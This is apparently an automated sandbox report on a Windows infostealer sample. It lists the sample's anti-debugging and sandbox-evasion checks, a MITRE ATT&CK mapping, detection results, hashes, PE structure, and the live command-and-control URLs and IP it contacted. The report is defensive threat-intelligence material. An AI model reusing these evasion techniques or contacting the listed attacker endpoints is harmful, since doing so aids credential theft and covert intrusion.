Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile opened: NTICE
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile opened: SICE
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeCode function: 0_2_00B69980 rdtsc 0_2_00B69980
Source: dZsdMl5Pwl.exe, dZsdMl5Pwl.exe, 00000000.00000002.2480157187.00000000011EA000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\dZsdMl5Pwl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.12:49712 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
dZsdMl5Pwl.exe53%ReversingLabsWin32.Trojan.Generic
dZsdMl5Pwl.exe100%AviraTR/Crypt.TPM.Gen
dZsdMl5Pwl.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686269630%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQ0%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd40%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0false
        		high
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
          		high
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.htmldZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://home.fiveth5ht.top/OyKvQdZsdMl5Pwl.exe, 00000000.00000003.2466035923.0000000001BAF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://html4/loose.dtddZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  https://httpbin.org/ipbeforedZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    https://curl.se/docs/http-cookies.htmldZsdMl5Pwl.exe, dZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://curl.se/docs/hsts.html#dZsdMl5Pwl.exefalse
                        		high
                        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSdZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963dZsdMl5Pwl.exe, 00000000.00000002.2480706350.0000000001B1E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4dZsdMl5Pwl.exe, 00000000.00000002.2480706350.0000000001B1E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://curl.se/docs/alt-svc.htmldZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://.cssdZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
                              		high
                              http://.jpgdZsdMl5Pwl.exe, 00000000.00000003.2336283494.0000000007950000.00000004.00001000.00020000.00000000.sdmp, dZsdMl5Pwl.exe, 00000000.00000002.2479623411.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpfalse
                                		high

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                34.226.108.155
                                		httpbin.orgUnited States
                                		14618AMAZON-AESUSfalse
                                5.101.3.217
                                		home.fiveth5ht.topRussian Federation
                                		34665PINDC-ASRUfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1581393
                                Start date and time:2024-12-27 14:53:11 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 56s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:4
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:dZsdMl5Pwl.exe
                                renamed because original name is a hash value
                                Original Sample Name:efd7bbaba8aa8e6865430d1ffcfbf2d5.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: dZsdMl5Pwl.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                34.226.108.155BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                  5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                    3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                      4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                        8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                          mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                            HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                              vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                                jklg6EIhyR.exeGet hashmaliciousUnknownBrowse
                                                  qr2JeuLuOQ.exeGet hashmaliciousUnknownBrowse
                                                    5.101.3.217BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                    w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    home.fiveth5ht.topBkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    w6cYYyWXqJ.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    httpbin.orgBkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                    • 34.226.108.155
                                                    4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    PINDC-ASRUBkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                    • 5.101.3.217
                                                    OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    lolvgcpX19.exeGet hashmaliciousUnknownBrowse
                                                    • 5.101.3.217
                                                    AMAZON-AESUSBkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                    • 34.226.108.155
                                                    5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                    • 34.226.108.155
                                                    db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                                    • 34.195.210.183
                                                    OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103
                                                    qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                    • 3.218.7.103
                                                    Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                    • 3.218.7.103

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    No created / dropped files found

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Entropy (8bit):7.985643284885463
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:dZsdMl5Pwl.exe
                                                    File size:4'523'520 bytes
                                                    MD5:efd7bbaba8aa8e6865430d1ffcfbf2d5
                                                    SHA1:a9c1b894dc0628909524f21c2b8da3d80d4d1725
                                                    SHA256:044837966b88050aafba12d5765a42768de8b1b55cd83a274df9a0fcf17fede2
                                                    SHA512:eacc546270f7cc56567b2003ff0274ec063f756dda74a523a571be93197ae09167b37e6e644e67f586bbd23d4645684d00f5e5be28f991dc19e6fcd281957fd9
                                                    SSDEEP:98304:f9BerfMdJtZSrZBU0/2pF+TTwmddqkqNhoJKs5L:f9SMqYAqmdgNhoM
                                                    TLSH:6B2633697D29BCB3CD22D771BB07D828CDE63E742A1CA95871337A60A4153781B3D983
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...@....... I...@..........................p........E...@... ............................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x1044000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                    DLL Characteristics:DYNAMIC_BASE
                                                    Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Authenticode Signature

                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                    Not Before, Not After
                                                      Subject Chain
                                                        Version:
                                                        Thumbprint MD5:
                                                        Thumbprint SHA-1:
                                                        Thumbprint SHA-256:
                                                        Serial:

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp 00007F49E4D2287Ah
                                                        pmulhuw mm0, qword ptr [eax+eax+00h]
                                                        add byte ptr [eax], al
                                                        add cl, ch
                                                        add byte ptr [eax], ah
                                                        add byte ptr [eax], al
                                                        add byte ptr [edi], al
                                                        or al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], dl
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [0000000Ah], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [edi], al
                                                        or al, byte ptr [eax]
                                                        add byte ptr [0000000Ah], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], cl
                                                        add byte ptr [eax], 00000000h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        adc byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        pop es
                                                        or al, byte ptr [eax]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc42d140x10sqttxtfh
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0xc42cc40x18sqttxtfh
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        0x10000x6db0000x288a002615fd27bd66b149e5e5e532d281c150unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x6dc0000x1ac0x200c979f6ecbab12019998cc4f6cd466ed2False0.58203125data4.582961505512809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        0x6de0000x3a10000x2008f59b0972614fbf87f930b405e2fd01aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        sqttxtfh0xa7f0000x1c40000x1c4000df38adbd30864cf2ff50aa80c2597d73False0.9945883961905421data7.955283388143556IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        byszctih0xc430000x10000x40081d1aaf34c5f0299449799f5696a1b02False0.826171875data6.404714975012909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .taggant0xc440000x30000x22004c683d03eaef372592eb092cae0a182aFalse0.05939797794117647DOS executable (COM)0.7711665864792157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_MANIFEST0xc42d240x152ASCII text, with CRLF line terminators0.6479289940828402

                                                        Imports

                                                        DLLImport
                                                        kernel32.dlllstrcpy

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 27, 2024 14:54:10.042198896 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:10.042226076 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:10.042294979 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:10.057296991 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:10.057312965 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:11.867162943 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:11.873127937 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:11.873157024 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:11.874864101 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:11.874963045 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:11.897281885 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:11.897521973 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:11.935033083 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:11.935064077 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:11.983234882 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:12.264374971 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:12.264480114 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:12.264538050 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:12.277715921 CET49711443192.168.2.1234.226.108.155
                                                        Dec 27, 2024 14:54:12.277759075 CET4434971134.226.108.155192.168.2.12
                                                        Dec 27, 2024 14:54:14.239208937 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.359096050 CET80497125.101.3.217192.168.2.12
